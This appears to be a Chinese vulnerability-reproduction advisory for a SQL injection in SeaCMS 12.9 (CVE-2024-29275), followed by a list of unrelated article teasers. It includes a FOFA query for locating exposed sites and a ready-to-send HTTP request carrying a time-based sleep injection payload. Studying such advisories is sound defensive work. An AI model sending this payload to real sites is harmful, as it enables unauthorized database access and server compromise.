海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞复现(CVE-2024-29275)

0x01 产品简介

海洋CMS是一套专为不同需求的站长而设计的内容管理系统,灵活、方便、人性化设计、简单易用是最大的特色,可快速建立一个海量内容的专业网站。海洋CMS基于PHP+MySql技术开发,完全开源免费 、无任何加密代码。

0x02 漏洞概述

海洋CMS影视管理系统 /js/player/dmplayer/dmku/ 接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。

0x03 影响范围

SeaCMS 12.9

0x04 复现环境

FOFA:app="海洋CMS"

0x05 漏洞复现

PoC

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

延时5秒

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/702676.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

CTF-AWD入门手册

引文 AWD赛制是一种网络安全竞赛的赛制。AWD赛制由安全竞赛专家及行业专家凭借十多年实战经验,将真实网络安全防护设备设施加入抽象的网络环境中,模拟政府、企业、院校等单位的典型网络结构和配置,开展的一种人人对抗的竞赛方式,…

使用itextPDF实现PDF电子公章工具类

一、制作公章 在线网站:印章生成器 - Kalvin在线工具 (kalvinbg.cn) 然后对公章进行下载保存 盖章图片: 二、生成数字签名 2.1: java工具keytool生成p12数字证书文件 Keytool是用于管理和证书的工具,位于%JAVA_HOME%/bin目录。…

深入理解Qt多线程编程(QThreadPool)

多线程编程在现代软件开发中变得越来越重要,它能够提高应用程序的响应速度和处理性能。在Qt框架中,QThreadPool作为线程池管理工具,被频繁的使用。 目录 概述 接口介绍 底层原理解析 使用方法 概述 QThreadPool是Qt提供的一个线程池实现&a…

计算机视觉全系列实战教程:(八)图像变换-点运算、灰度变换、直方图变换

图像变换:点运算、灰度变换、直方图变换 1.点运算(1)What(2)Why 2.灰度变换(1)What(2)Why(作用)(3)Which(有哪些灰度变换) 3.直方图修正(1)直方图均衡化 1.点运算 (1)What 通过点运算,输出图像的每个像素的灰度值仅仅取决于输入图像中相对应…

eNSP学习——PPP的认证

目录 主要命令 原理概述 实验目的 实验内容 实验拓扑 实验编址 实验步骤 1、基本配置 2、搭建OSPF网络 3、配置PPP的PAP认证 4、配置PPP的CHAP认证 主要命令 //设置本端的PPP协议对对端设备的认证方式为 PAP,认证采用的域名为huawei [R3]int s4/0/0 [R…

C语言 RTC时间(年月日时分秒) 和 时间戳 互相转换

一、介绍 在C语言中,将年月日时分秒转换为时间戳(Unix时间戳,即从1970年1月1日00:00:00 UTC到现在的秒数)通常需要使用struct tm结构体和timegm或mktime函数。(注意,mktime函数假设struct tm是本地时间&…

面试题分享之JVM篇

注意:文章若有错误的地方,欢迎评论区里面指正 🍭 系列文章目录 面试题分享之Java并发篇面试题分享之Java集合篇(二) 前言 学过Java的小伙伴肯定对JVM(Java虚拟机)多多少少了解一点&#xff0c…

工程项目管理系统:高效、专业的工程管理软件

在当今快速发展的工程行业,有效的项目管理是确保项目成功的关键。鸿鹄工程项目管理系统,基于Spring Cloud、Spring Boot、Mybatis、Vue和ElementUI技术栈,提供了一个全面、高效的解决方案,以应对复杂的工程项目管理挑战。 项目背景…

ChatGLM3-6B-32K 在linux(Ubuntu) GPU P100(16G)复现记录

ChatGLM3-6B-32K 在linux(Ubuntu) GPU P100(16G)复现记录 时间:2024年6月12日 1.创建Conda环境 conda create --name chatglm3 python3.10 conda activate chatglm32.下载chatglm,并安装依赖 如果没有安装git命令,先安装git命令 sudo ap…

开展文化科技卫生“三下乡”活动怎样向媒体投稿宣传?

在新时代背景下,“文化科技卫生三下乡”活动作为推动乡村振兴、促进城乡融合发展的重要举措,正发挥着不可小觑的作用。这类活动通过输送文化、科技、卫生等领域的资源和服务到农村,极大地丰富了农民的精神生活,提升了农村的科学素…

【目标检测】基于深度学习的车牌识别管理系统(含UI界面)【python源码+Pyqt5界面 MX_002期】

系统简介: 车牌识别技术作为经典的机器视觉任务,具有广泛的应用前景。通过图像处理方法,车牌识别技术能够对车牌上的字符进行检测、定位和识别,从而实现计算机对车牌的智能化管理。在现实生活中,车牌识别系统已在小区停…

前端传递bool型后端用int收不到

文章目录 背景模拟错误点解决方法 背景 我前几天遇到一个低级错误,就是我前端发一个请求,把参数送到后端,但是我参数里面无意间传的布尔型(刚开始一直没注意到,因为当时参数有十几个),但是我后…

认证体系下的CID广告服务商:构建商家与服务商的共赢生态

摘要:引流电商服务商认证体系的构建促进了商家与服务商之间的顺畅合作,降低了风险,优化了资源配置。认证提升了服务商形象,扩大了市场份额,推动了行业技术创新和服务升级,构建了共赢生态。 在引流电商行业…

发布会后苹果股价创历史新高;商汤 Embedding 模型拿下 SOTA丨 RTE 开发者日报 Vol.223

开发者朋友们大家好: 这里是 「RTE 开发者日报」 ,每天和大家一起看新闻、聊八卦。我们的社区编辑团队会整理分享 RTE(Real-Time Engagement) 领域内「有话题的 新闻 」、「有态度的 观点 」、「有意思的 数据 」、「有思考的 文…

免密支付存隐患 谨防“便捷”变“踩坑”

免密支付存隐患 谨防“便捷”变“踩坑” 当前,我国网购用户已超9亿人,越来越便捷的支付手段让网络消费体验更加“丝滑”。但免密支付、自动续费等方式在简化付款流程的同时,也成为一些平台“套路”消费者的手段,暗藏诱导消费陷阱。…

闪烁与常亮的符号状态判断机制(状态机算法)

背景说明 在视觉项目中,经常要判断目标的状态,例如:符号的不同频率闪烁、常亮等。然而常规的视觉算法例如YOLO,仅仅只能获取当前帧是否存在该符号,而无法对于符号状态进行判断,然而重新写一个基于时序的卷积…

跟着AI学AI_09 PyTorch 简介

PyTorch 简介 PyTorch 是一个开源的深度学习框架,由 Facebook 的人工智能研究团队(FAIR)开发。它提供了灵活且高效的张量计算功能,并支持动态计算图。PyTorch 的易用性和灵活性使其成为深度学习研究和生产应用中广泛使用的工具。…

一维、二维数组练习题

1、输入一个6个元素的一维数组,实现冒泡排序 2、输入一个6个元素的一维数组,实现简单排序 3、输入一个5个元素的一维数组,求最大值,最小值 4、输入一个三行四列的二维数组,计算最大值和最小值

期权和股票有什么区别?

今天带你了解期权和股票有什么区别?股票和期权都是投资产品,但它们却是两种截然不同的交易模式,在开户要求上也有很多差别。 期权和股票有什么区别? 权利与义务: 股票:代表公司的所有权的一部分&#xff…

【扫码点餐系统】制作搭建部署

前言: 餐饮类做一个扫码点餐的工具可以提升用户体验、扩大市场份额、提高运营效率以及适应数字化趋势等方面。 一、企业开发小程序原因 企业开发小程序具有多方面的优势,可以帮助企业提升用户体验、扩大市场份额、提高运营效率以及适应数字化趋势等。…